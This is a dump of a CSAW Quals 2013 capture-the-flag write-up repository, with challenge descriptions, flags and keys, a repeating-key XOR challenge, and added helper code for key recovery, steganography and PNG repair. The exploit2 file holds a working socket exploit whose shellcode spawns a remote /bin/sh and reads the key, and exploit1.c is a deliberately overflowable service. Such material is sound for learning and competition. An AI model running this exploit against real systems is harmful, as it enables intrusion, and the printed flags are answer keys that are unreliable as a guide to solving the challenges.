| * [misc/network2-50](misc/network2-50) 13 | 14 | ## External write-ups only 15 | 16 | * none yet 17 | 18 | ## Missing write-ups 19 | 20 | * [crypto/csawpad-100](crypto/csawpad-100) 21 | * [crypto/onlythisprogram-300](crypto/onlythisprogram-300) 22 | * [crypto/slurp-500](crypto/slurp-500) 
* [exploitation/csawdiary-300](exploitation/csawdiary-300)
* [exploitation/exploit1-100](exploitation/exploit1-100)
* [exploitation/exploit2-200](exploitation/exploit2-200)
* [exploitation/miteegashun-400](exploitation/miteegashun-400)
* [exploitation/scp-hack-500](exploitation/scp-hack-500)
* [misc/life-300](misc/life-300)
* [reversing/bikinibonanza-150](reversing/bikinibonanza-150)
* [reversing/crackme-300](reversing/crackme-300)
* [reversing/csaw2013reversing1-100](reversing/csaw2013reversing1-100)
* [reversing/csaw2013reversing2-200](reversing/csaw2013reversing2-200)
* [reversing/dotnet-100](reversing/dotnet-100)
* [reversing/impossible-500](reversing/impossible-500)
* [reversing/keygenme-400](reversing/keygenme-400)
* [reversing/noobs-first-firmware-mod-500](reversing/noobs-first-firmware-mod-500)
* [web/cryptomatv2-400](web/cryptomatv2-400)
* [web/guess-harder-100](web/guess-harder-100)
* [web/herpderper-300](web/herpderper-300)
* [web/nevernote-200](web/nevernote-200)
* [web/widgetcorp-400](web/widgetcorp-400)
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/csawpad-100/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: CSAWpad

**Category:** Crypto
**Points:** 100
**Solves:** 141
**Description:**

> [csawpad.py](csawpad.py)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: onlythisprogram

**Category:** Crypto
**Points:** 300
**Solves:** 127
**Description:**

>
> [onlythisprogram.tgz](onlythisprogram.tgz)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/README:
--------------------------------------------------------------------------------
QUESTION TEXT:

I tested out my new encryption tool on some files from the internet and it seems like it worked pretty good. What do you think?

FILE: onlythisprogram.tgz

HINT (if necessary):

You don't have to figure out the whole key to solve the challenge. Some file formats make better oracles than others.

SOLVE:

See solve.py for my half-solution with explanation.

KEY:

BuildYourOwnCryptoSoOthersHaveJobSecurity

echo "For some reason psifertex really likes figlets. In this case it's necessary because the file size should not be a huge giveaway. Though I suppose images would have worked too.
Anyway, the key is: BuildYourOwnCryptoSoOthersHaveJobSecurity"|sed 's/ / /g'|figlet -w 3000|gzip > key
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/onlythisprogram.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python
import os
import sys
import argparse

blocksize=256

parser = argparse.ArgumentParser(description="Custom encryption algorithm because a friend said that's the way to do it. Anyway, it's called 'Only This Program' since I'm pretty sure that only this program can securely decrypt the files as long as you don't give out your secret.dat file created when you encrypt something.")
parser.add_argument('--infile', metavar='i', nargs='?', type=argparse.FileType('r'), help='input file, defaults to standard in', default=sys.stdin)
parser.add_argument('--outfile', metavar='o', nargs='?', type=argparse.FileType('wb'), help='output file, defaults to standard out', default=sys.stdout)
parser.add_argument('--secretkey', metavar='s', nargs='?', type=argparse.FileType('a+'), help='output file, defaults to secretkey.dat', default='secretkey.dat')

args = parser.parse_args()


sys.stderr.write('\nReading random bytes from OS. If hung, please introduce entropy.\n')

args.secretkey.truncate()

# The key is 256 random bytes, and they are only generated until
# secretkey.dat holds that many: once the file exists, every later run
# reuses the same key (runme.sh deletes it once, before its loop, so all
# nine inputs are encrypted under one key).
while (args.secretkey.tell() < blocksize):
    # maybe remove the next line for release since it makes it more obvious the key only generates once?
    sys.stdout.write('.')
    args.secretkey.write(os.urandom(1))

counter=0
args.secretkey.seek(0)
keydata = args.secretkey.read(blocksize)

# Repeating-key XOR: plaintext byte i is XORed with keydata[i % 256], so the
# same key byte covers position i of every file encrypted with this key.
while 1:
    byte = args.infile.read(1)
    if not byte:
        break
    args.outfile.write(chr(ord(keydata[counter % len(keydata)]) ^ ord(byte)))
    counter+=1

sys.stderr.write('\nSecret keyfile: %s\nInput file: %s\nOutput file: %s\nTotal bytes: %d \n' % (args.secretkey.name, args.infile.name, args.outfile.name, counter))
```
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/runme.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash
rm -rf output
mkdir output
rm secretkey.dat
# one key file for the whole loop: every input is encrypted under the same 256 bytes
for file in input/*
do
    ./onlythisprogram.py --infile $file --outfile output/file$((COUNT++)).enc
done
```
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/slurp-500/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: slurp

**Category:** Crypto
**Points:** 500
**Solves:** 27
**Description:**

> We've found the source to the Arstotzka spies rendevous server, we must find out their new vault key.
>
> [slurp.py](slurp.py)
>
> nc 128.238.66.222 7788

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: CSAW Diary

**Category:** Exploitation
**Points:** 300
**Solves:** 116
**Description:**

> nc 128.238.66.217 34266
>
> [fil_chal](fil_chal)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/fil_chal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/csawdiary-300/fil_chal
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Exploitation 1

**Category:** Exploitation
**Points:** 100
**Solves:** 701
**Description:**

> nc 128.238.66.212 31337
>
> [exploit1](exploit1)
>
> [exploit1.c](exploit1.c)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit1-100/exploit1
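An added example for crypto/onlythisprogram-300 (the challenge script, runme.sh and the author's hint are listed above). This is editor-supplied code, not the challenge's solve.py: it re-implements the 256-byte repeating-key XOR from onlythisprogram.py, shows that the file signatures of the nine inputs pin down only the first few key bytes (every file starts at key offset 0, so headers all hit the same positions), and then recovers the whole key from the one format that makes a good oracle, an uncompressed bitmap with a long run of one byte value. Everything about the inputs is constructed: the stand-in files, the name-to-signature table, and the assumption that the real BMP has a flat background at least 256 bytes long.

```python
import os
import struct

BLOCKSIZE = 256  # key length in onlythisprogram.py


def repeating_xor(key, data):
    """Byte i of data XORed with key[i % len(key)], exactly what the
    challenge script does; encryption and decryption are the same call."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# File signatures of the formats under source/input/. Which fileN.enc is
# which input is not known here, so the example keys everything by name.
MAGIC = {
    "Hackers.mid": b"MThd",
    "Tux_ecb.jpg": b"\xff\xd8\xff",
    "diagram.png": b"\x89PNG\r\n\x1a\n",
    "enigma.jpg": b"\xff\xd8\xff",
    "key.gz": b"\x1f\x8b\x08",
    "linux-penguin5_blastfishing_com.bmp": b"BM",
    "logo.gif": b"GIF8",
    "nelson.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
    "shannon1948.pdf": b"%PDF-",
}


def key_bytes_from_signatures(ciphertexts):
    """Known plaintext: K[i] = C[i] ^ P[i]. Every file starts at key offset
    0, so signatures reveal only the first few key bytes no matter how many
    files were encrypted."""
    known = {}
    for name, ct in ciphertexts.items():
        for i, (c, p) in enumerate(zip(ct, MAGIC[name])):
            known.setdefault(i, c ^ p)
    return known


def longest_periodic_run(ct, period=BLOCKSIZE):
    """(start, length) of the longest span with ct[j] == ct[j + period].
    Because the key repeats every `period` bytes, that equality holds
    exactly where the plaintext repeats with that period, e.g. a flat
    background in an uncompressed bitmap. No key knowledge is needed."""
    best_start = best_len = 0
    j, limit = 0, len(ct) - period
    while j < limit:
        if ct[j] != ct[j + period]:
            j += 1
            continue
        start = j
        while j < limit and ct[j] == ct[j + period]:
            j += 1
        if j - start > best_len:
            best_start, best_len = start, j - start
    return best_start, best_len


def recover_key(ciphertexts, oracle):
    """Inside a run of one plaintext byte v, C[j] = K[j % 256] ^ v, so a run
    of at least 256 bytes yields K ^ v at every offset. One known signature
    byte of the same file then fixes v, and with it the whole key."""
    ct = ciphertexts[oracle]
    start, length = longest_periodic_run(ct)
    if length < BLOCKSIZE:
        raise ValueError("no run long enough to cover every key offset")
    key_xor_v = bytearray(BLOCKSIZE)
    for j in range(start, start + BLOCKSIZE):
        key_xor_v[j % BLOCKSIZE] = ct[j]
    k0 = ct[0] ^ MAGIC[oracle][0]   # K[0] from the file signature
    v = key_xor_v[0] ^ k0           # hence the run's plaintext byte
    return bytes(b ^ v for b in key_xor_v)


def key_is_consistent(key, ciphertexts):
    """Check before trusting a candidate key: every file decrypted with it
    must start with its expected signature."""
    return all(repeating_xor(key, ct).startswith(MAGIC[name])
               for name, ct in ciphertexts.items())


def make_sample_inputs():
    """Constructed stand-ins for the real inputs (signature plus filler), and
    a BMP whose 2 KiB white background supplies the long constant run."""
    files = {}
    for name, magic in MAGIC.items():
        files[name] = magic + bytes((i * 7 + 3) & 0xFF for i in range(300))
    bmp_header = b"BM" + struct.pack("<IHHI", 54 + 2048, 0, 0, 54) + bytes(40)
    files["linux-penguin5_blastfishing_com.bmp"] = bmp_header + b"\xff" * 2048
    return files


def demo():
    key = os.urandom(BLOCKSIZE)  # the role of secretkey.dat
    ciphertexts = {n: repeating_xor(key, p) for n, p in make_sample_inputs().items()}
    from_sigs = key_bytes_from_signatures(ciphertexts)
    recovered = recover_key(ciphertexts, "linux-penguin5_blastfishing_com.bmp")
    return len(from_sigs), recovered == key, key_is_consistent(recovered, ciphertexts)
```

With the real files, replace make_sample_inputs() with the contents of output/file0.enc to file8.enc keyed by whichever input each one turned out to be; key_is_consistent() is the check that the guess for v was right before decrypting the gzip file and running it through gunzip.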
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1.c:
--------------------------------------------------------------------------------
```c
[snip]

void handle(int newsock) {
    int backdoor = 0;           /* the program itself never sets this */
    char buffer[1016];
    memset(buffer, 0, 1016);

    send(newsock, "Welcome to CSAW CTF.", 21, 0);
    /* 1020 bytes are read into a 1016-byte buffer: the overflow is meant
       to reach backdoor, which sits next to it on the stack */
    recv(newsock, buffer, 1020, 0);
    buffer[1015] = 0;

    if ( backdoor ) {           /* any non-zero overwrite opens the backdoor */
        fd = fopen("./key", "r");
        fscanf(fd, "%s\n", buffer);
        send(newsock, buffer, 512, 0);
    }
    close(newsock);
}

[snip]
```
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Exploitation 200

**Category:** Exploitation
**Points:** 200
**Solves:** 198
**Description:**

> nc 128.238.66.212 31338
>
> [exploit2](exploit2)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/e.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python2
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("128.238.66.212", 31338))

# The service sends two 4-byte values before its banner; both are sprayed
# back into the payload below.
i = s.recv(4)
j = s.recv(4)
print s.recv(100)

# NOP sled, then a "find the socket" shellcode: it tries descriptors 19
# down to 1, read()s 4 bytes from each and compares them with 0xcafef00d
# (the cmp dword [ecx], 0xcafef00d encoded as 81 39 0d f0 fe ca), dup2()s
# the matching descriptor onto fds 2, 1 and 0, then execve()s /bin//sh.
# Both leaked values are repeated rather than placed at one offset, so the
# exact stack layout does not have to be known.
payload = (("\x90"*100) +
           ("\x89\xe1\x66\x31\xc9\x31\xdb\xb3\x14\x31\xd2\xb2\x04\x4b\x75\x02\xcd\x03\x31\xc0\xb0\x03\xcd\x80\x3c\x04\x75\xf1\x81\x39\x0d\xf0\xfe\xca\x75\xe9\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80") +
           (j*473) +
           (i*10))

s.send(payload)
s.send("\x0d\xf0\xfe\xca")   # the marker the shellcode scans for: 0xcafef00d, little-endian
s.send("cat key\n")          # runs in the spawned shell over the same socket
print s.recv(100)
```
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/exploit2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit2-200/exploit2
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: miteegashun

**Category:** Exploitation
**Points:** 400
**Solves:** 85
**Description:**

> nc 128.238.66.221 5930
>
> [miteegashun](miteegashun)

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/miteegashun:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/miteegashun-400/miteegashun
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/scp-hack-500/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: SCP-hack

**Category:** Exploitation
**Points:** 500
**Solves:** 7
**Description:**

> The SCP organization (http://128.238.66.211:45000) wants you to join, accept and see if you can take advantage of their interns sloppy coding and outdated browser.

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/scp-hack-500/solution.txt:
--------------------------------------------------------------------------------
http://blog.dragonsector.pl/2013/09/csaw-ctf-quals-2013-scp-hack.html
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Black & White

**Category:** Misc
**Points:** 100
**Solves:** 818
**Description:**

> [chal.png](chal.png)

## Write-up

We are given a PNG that seems to be just white.

However, using a steganography tool like [stegsolve](https://aur.archlinux.org/packages/stegsolve/), we see the flag in bit plane 0 (the least significant bit) of the red, green or blue channel:

![](key.png)

The flag is `key{forensics_is_fun}`.
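What stegsolve's plane view computes, as an added example (editor's code, not part of the write-up): one bit of one channel across the whole image, plus a scan over all 24 planes for the ones that are not uniform. The pixel data is a constructed 5x3 "white" image whose least significant bits spell a shape; chal.png itself is not decoded here, so feed the functions a flat list of (r, g, b) tuples from whatever PNG reader you use.

```python
def bit_plane(pixels, width, channel, bit):
    """Rows of 0/1 for one bit of one channel. pixels is a flat list of
    (r, g, b) tuples in scanline order; channel 0/1/2 is R/G/B; bit 0 is
    the least significant bit, the plane stegsolve labels "Red plane 0"."""
    rows = []
    for y in range(len(pixels) // width):
        row = pixels[y * width:(y + 1) * width]
        rows.append([(px[channel] >> bit) & 1 for px in row])
    return rows


def render(plane):
    """ASCII view of a plane: '#' where the bit is set, '.' where it is clear."""
    return "\n".join("".join("#" if b else "." for b in row) for row in plane)


def plane_is_flat(plane):
    """A plane whose bits are all identical carries nothing."""
    return len({b for row in plane for b in row}) == 1


def interesting_planes(pixels, width):
    """(channel, bit) of every plane that is not flat: the ones to look at.
    A visually white image has every high bit set, so only the low planes
    can hold structure."""
    return [(channel, bit)
            for channel in range(3)
            for bit in range(8)
            if not plane_is_flat(bit_plane(pixels, width, channel, bit))]


def make_sample(width=5, height=3):
    """Constructed image (not chal.png): every channel is 254 or 255, so the
    eye sees white while the LSB of each channel draws an 'I'."""
    pattern = ["#####", "..#..", "#####"]
    pixels = []
    for y in range(height):
        for x in range(width):
            lsb = 1 if pattern[y][x] == "#" else 0
            pixels.append((254 | lsb, 254 | lsb, 254 | lsb))
    return pixels
```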

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/chal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/chal.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/key.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: deeeeeeaaaaaadbeeeeeeeeeef

**Category:** Misc
**Points:** 200
**Solves:** 224
**Description:**

> [IMG_0707.png](IMG_0707.png)

## Write-up

We are given a corrupt PNG file:

```bash
$ file IMG_0707.png
IMG_0707.png: PNG image data, 3264 x 1681, 8-bit/color RGBA, non-interlaced
$ pngcheck IMG_0707.png
IMG_0707.png CRC error in chunk IHDR (computed fcc410a8, expected c1d0b3e4)
ERROR: IMG_0707.png
```

Editing the IHDR CRC in `hexedit` to the computed value yields a valid PNG:

![](1.png)
![](2.png)
![](resized_for_repo.png)

The picture looks cropped, though: `3264:1681 ~= 1.94:1` is an unusual aspect ratio. `exiftool` shows it was taken with an iPhone 5:

```bash
$ exiftool IMG_0707.png
ExifTool Version Number         : 9.76
[...]
Source                          : iPhone 5
Software                        : 6.1.4
[...]
Image Size                      : 3264x1681
```

An [iPhone 5 camera](http://en.wikipedia.org/wiki/IPhone#Screen_and_input) takes 4:3 photos (16:9 for video), so the height in IHDR has been lowered: the rows below 1681 are still in the image data, the decoder just stops drawing them. We set the height back to the 4:3 value (3264 × 3/4 = 2448) with `hexedit` and fix the resulting new IHDR CRC:

![](wxh_orig.png)
![](wxh_fixd.png)
```bash
$ pngcheck NEW.png
NEW.png CRC error in chunk IHDR (computed f754da63, expected fcc410a8)
ERROR: NEW.png
```
![](crc_fixd.png)
![](flag.png)

The flag is `Key{TheISISPasswordIs}`.
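The IHDR edit above, as an added example in Python (editor's code, not the write-up's hexedit session): it lists CRC mismatches the way pngcheck does, rewrites the IHDR dimensions and recomputes the chunk CRC, and, instead of guessing from the camera's aspect ratio, reads the true height off the IDAT stream: after inflation every scanline is one filter byte plus width × bytes-per-pixel, so the payload length gives the row count whatever IHDR claims. The file it runs on is a constructed 4×8 grayscale PNG with a faked height of 4 and a stale CRC; IMG_0707.png itself is not included.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
BYTES_PER_PIXEL = {0: 1, 2: 3, 4: 2, 6: 4}   # 8-bit grey, RGB, grey+alpha, RGBA


def chunk_crc(ctype, body):
    """A PNG chunk CRC covers the type field and the data, not the length."""
    return zlib.crc32(ctype + body) & 0xFFFFFFFF


def iter_chunks(data):
    """Walk the chunk list: yields (offset, type, body, stored_crc)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        yield pos, ctype, body, stored
        pos += 12 + length
        if ctype == b"IEND":
            break


def crc_errors(data):
    """What pngcheck reports: [(type, computed, stored)] for every bad chunk."""
    return [(ctype.decode(), chunk_crc(ctype, body), stored)
            for _, ctype, body, stored in iter_chunks(data)
            if chunk_crc(ctype, body) != stored]


def ihdr(data):
    """(width, height, bit_depth, colour_type) from the IHDR chunk."""
    for _, ctype, body, _ in iter_chunks(data):
        if ctype == b"IHDR":
            return struct.unpack(">IIBB", body[:10])
    raise ValueError("no IHDR chunk")


def set_dimensions(data, width, height):
    """Rewrite IHDR width/height and recompute its CRC: the hexedit step."""
    for pos, ctype, body, _ in iter_chunks(data):
        if ctype == b"IHDR":
            new_body = struct.pack(">II", width, height) + body[8:]
            chunk = (struct.pack(">I", len(new_body)) + ctype + new_body
                     + struct.pack(">I", chunk_crc(ctype, new_body)))
            return data[:pos] + chunk + data[pos + 12 + len(body):]
    raise ValueError("no IHDR chunk")


def true_height(data):
    """Inflate the IDAT stream and count scanlines: each row is one filter
    byte plus width * bytes-per-pixel (8-bit, non-interlaced images only)."""
    width, _, depth, colour = ihdr(data)
    if depth != 8:
        raise ValueError("only 8-bit images handled here")
    idat = b"".join(body for _, ctype, body, _ in iter_chunks(data) if ctype == b"IDAT")
    return len(zlib.decompress(idat)) // (1 + width * BYTES_PER_PIXEL[colour])


def aspect_height(width, ratio=(4, 3)):
    """The write-up's route: the height implied by the camera's aspect ratio."""
    return width * ratio[1] // ratio[0]


def make_sample(width=4, real_height=8, claimed_height=4):
    """Constructed stand-in for IMG_0707.png: a grayscale image whose IHDR
    understates the height and carries a stale CRC, as the challenge file did."""
    rows = b"".join(b"\x00" + bytes(y * 16 + x for x in range(width)) for y in range(real_height))
    ihdr_body = struct.pack(">IIBBBBB", width, real_height, 8, 0, 0, 0, 0)

    def chunk(ctype, body):
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", chunk_crc(ctype, body))

    good = PNG_SIG + chunk(b"IHDR", ihdr_body) + chunk(b"IDAT", zlib.compress(rows)) + chunk(b"IEND", b"")
    height_at = len(PNG_SIG) + 8 + 4    # past the IHDR length+type and the width field
    return good[:height_at] + struct.pack(">I", claimed_height) + good[height_at + 4:]


def demo():
    broken = make_sample()
    errors = [name for name, _, _ in crc_errors(broken)]
    fixed = set_dimensions(broken, ihdr(broken)[0], true_height(broken))
    return errors, ihdr(fixed)[:2], crc_errors(fixed)
```

For the challenge image, true_height() on the CRC-repaired file is the number to put in IHDR; aspect_height(3264) is the 4:3 guess and should agree with it if the photo was only cropped at the bottom.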
## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png
--------------------------------------------------------------------------------
